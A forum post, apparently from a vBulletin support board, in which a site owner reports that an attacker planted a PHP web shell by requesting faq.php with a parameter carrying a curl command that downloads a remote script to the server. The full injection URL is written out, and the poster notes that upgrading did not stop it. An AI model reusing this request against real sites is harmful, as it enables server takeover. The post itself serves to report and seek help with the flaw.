![]() |
Forum faq.php vulnerability? Hi, Today I found a file uploaded to my site, w.php. It was a classic php script that gives full access to the server. The file was added to my server by someone going to: myforums.com/faq.php?c=curl%20http://wsipay.com/w.txt%20-o%20w.php I was running 4.1.10 but I upgraded thinking that it might be an old exploit. But I find it still downloads the file successfully having upgraded to 4.2.0, it happily downloads the file to my site just by going to that URL. |
الساعة الآن 09:34 AM |
Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.5.2 TranZ By
Almuhajir